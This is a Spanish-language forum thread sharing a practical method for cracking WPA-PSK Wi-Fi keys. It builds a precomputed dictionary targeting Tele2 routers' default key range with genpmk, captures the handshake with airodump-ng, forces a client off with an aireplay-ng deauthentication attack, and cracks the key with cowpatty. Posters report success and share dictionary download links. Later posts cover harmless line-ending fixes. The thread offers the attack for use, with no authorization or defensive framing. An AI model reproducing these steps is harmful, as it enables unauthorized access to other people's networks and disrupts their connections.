Diccionarios WPA+PSK:Cowpatty

[MMRX]

Buenas, inicio este post que parece interesante el tema.

Creación de un diccionario con el comando 'genpmk'

genmpk -f wpa_tele2.txt -d tele2.dic -s Tele2

-f Archivo de donde cogeremos el texto para el diccionario, en mi caso un archivo en texto plano con 12 MB que van desde IX1V7000000 hasta IX1V7999999

-d Archivo de salida, el archivo nuevo que se creará

-s Essid

*Con este comando creamos un diccionario precomb***do para despues utilizar con el cowpatty(Ojo! a mi me ha tardado poco mas de 6 horas con un core 2 duro a 1.3Ghz)*

Conseguir el Handshake necesario
     
1 airodump-ng --bssid 00:01:02:03:04:05 -c11 -w psk wifi0
      -bssid Mac del ap
      -c Canal
      -w Nombre de salida del fichero

2 aireplay-ng -0 5 -a 00:01:02:03:04:05 -c 11:22:33:44:55:66 wifi0
       -a Mac del ap
       -c Mac del cliente autentificado

Dejamos corriendo el airodump para capturar solamente ese ap, en el segundo punto lanzamos un ataque de desautentificación, cuando el cliente reconecte arriba a la derecha veremos la frase 'Handshake 00:01:02:03:04:05', quizas tengamos que repetir el ataque 2 en alguna ocasión, no de forma muy repetida para dar tiempo a reconectar al cliente

Combinando el diccionario creado y el handshake

cowpatty -r psk*.cap -d tele2.dic -s Tele2
        -r Ruta del archivo .cap que guarda el airodump
        -d Ruta del archivo del diccionario que hemos creado
        -s Essid

Con esto lo que hacemos es pasar el fichero.cap por todo el diccionario de forma que en 20 segundos analiza 1.000.000 de passphrases.

Bien, hasta aqui la teorica muy bonita, yo me encuentro en el punto de que he creado el diccionario apartir de un fichero en texto plano, que de la forma tradicional si que me encuentra la key, pero de esta forma no, segun comentamos el problema podria ser el retorno del carro o los saltos de linea.
Dar ideas, y si teneis nuevos diccionarios comentarlo. Espero que el post sea interesante  :-' :-' :-' :-' :-'

[chinitiw]

creo que esto será un buen aporte , quizas os sea de utilidad este enlace aqui ,

si no recuerdo mal he leido algo de un cowpatty plus , si lo encuentro lo posteo

cowpattyp , lo veo muy interesante dejo un enlace a ver que os parece

http://cowpattyp.tk/

creo que te permite hacer sesiones ... y eso tiene una pinta de p... m....

saludos   

[MMRX]

Os he subido los dos ficheros utilizados para este experimento

http://rapidshare.com/files/95172469/PSK_Cowpatty.tar.gz.html

son 36MB esta el fichero en texto plano y el precom****do que he creado.Suerte. y dar ideas

[chinitiw]

buen aporte ...   

[MMRX]

B I N G O ! ! !
Con el nuevo diccionario de hrodgar ha sacado la PSK en menos de 2 segundos tras testear mas de 85.000 passphrases. Os adjunto el link del diccionario:


http://www.megaupload.com/?d=UQCUYVJ6

 

[hrodgar]

Problema del "retorno de carro de fin de línea" en ficheros de diccionarios en texto plano para generar ficheros de hashes con genpmk para Cowpatty

- Que carajo es el Retorno de carro de fín de línea?

Cuando creas un documento de texto en MSDOS/Windows (como p.e. en Notepad o un programa de generación de diccionarios), Windows añade al final de cada línea un retorno de carro CR (carriage return) y un salto de línea LF (line feed). En cambio, en Linux/Unix, el formato de un documento de texto es solo un LF al final de cada línea. un ejemplo claro:

El típico error que resulta al crear un shell script (bash) o rutina en C en texto bajo windows, si tratas de ejecutarlo en entorno Linux/Unix te dice lo siguiente:

Código:

bash: ./programa.txt: /bin/bash^M: bad interpreter: No existe el fichero o el directorio

(Que no me ha pasado veces a mi y era esto... )

Pues resulta que a la hora de precomputar un diccionario en texto plano en formato windows con el genpmk, el programa te cojera en cada liena la palabra junto con el retorno de carro; en vez de CASA te cojerá CASA[CR]

- Como evitarlo antes de crearlo / como modificarlo?

Lo mejor... crear el fichero de texto bajo linux,.. no falla!

Modificarlo bajo linux:
Tambien, en caso de estar ya en un entorno Linux con un fichero de texto en formato Dos/Windows, se puede recurrir a "una operación de limpieza"; La sencilla: con el comando "dos2unix"; si no disponemos de el, pues con el editor Vi.

Con el dos2unix tan simple como:

Código:

dos2unix fichero.txt

Y ya està, el fichero convertido. facil, no?

Si no disponemos del comando, pues se edita el fichero con Vi:

Código:

Vi fichero.txt

Nos vamos a la última linea:

Código:

^G

con lo que saldra ":" en la línea de comando, y le decimos que desde la primera línea hasta la última ($) sustituye s ^M por nada. Sería así:

Código:

:1,$ s/{ctrl-V}{ctrl-M}//      (esto es, presionar ctrl-v y ctrl-m)
(en pantalla se verá esto:)
:1,$ s/^M//

y guardamos y salimos con x

Vale, en caso de que utilicemos Windows?

Facil, no utilizar el notepad, word, .... En cambio, se puede utilizar el programa Notepad++. Si no lo conoceis, es gratuito y le da mil vueltas al notepad.

En el caso de un fichero nuevo, simplemente antes de guardarlo, os vais a "Format" y seleccionais "Convert to UNIX format" en lugar del que es por defecto (Dos/Windows). si os fijais en el lateral derecho inferior de la ventana, donde antes salia Dos/Windows ahora os pondra UNIX. De esta manera no habrà los retornos de carro.

En el caso de un fichero existente o como p.e. el creado por un programa windows de generacion de diccionarios, pues procedemos de igual manera; abrimos el fichero con el Notepad++ y seleccionamos Format/Convert to UNIX format. Y ya esta, eliminados los dichosos retornos de carro del fichero.

Notas:
eliminar el retorno de carro no es un plisplas... se puede tirar rato (por no decir una hora o mas) como tengas un fichero enorme...
Eliminar el retorno de carro no estropea el fichero de texto para ser utilizado en texto plano.

Y ahora ya podemos crear el fichero de hashes con genpmk.

[MMRX]

Grandisimo ejemplo. Totalmente aclarado y solucionado el tema, empezamos con el resto de essid que no sean Tele2?

[βerni69]

cambio el titulo del post 

[MMRX]

Podrias explicar donde conseguir fácilmente el 'dos2unix'.
Gracias

[Mambostar]

Buenas

Converting text files to/from Unix/Dos/Mac
http://www.gammon.com.au/files/pennmush/unix2dos.zip - 19K - program to convert unix text files to DOS format
http://www.gammon.com.au/files/pennmush/dos2unix.zip - 19K - program to convert DOS text files to Unix format
http://www.gammon.com.au/files/pennmush/mac2unix.zip - 19K - program to convert Macintosh text files to Unix format
http://www.gammon.com.au/files/pennmush/unix2mac.zip - 19K - program to convert Unix text files to Macintosh format
http://www.gammon.com.au/files/pennmush/unix2dos.c - 7K - source code used to compile above 4 conversion programs

Saludos

[MMRX]

Muchas gracias por la aportación.

[sony_vaio]

disculpen x mi ignoracia (es que soy novato en esto), alguien sabe como instalar el cowpatty???   
u otros programas para WPA (diccionarios pues)

muchas gracias... 

[Elwyn]

Entonces....

Para Crear el Diccionario usando genmpk mas el Diccionario de hrodgar Seria asi:

genmpk -f Tele2_wpa_IX1V7.hashes -d tele2.dic -s Tele2

Asi¿? o e entendido todo mal :S?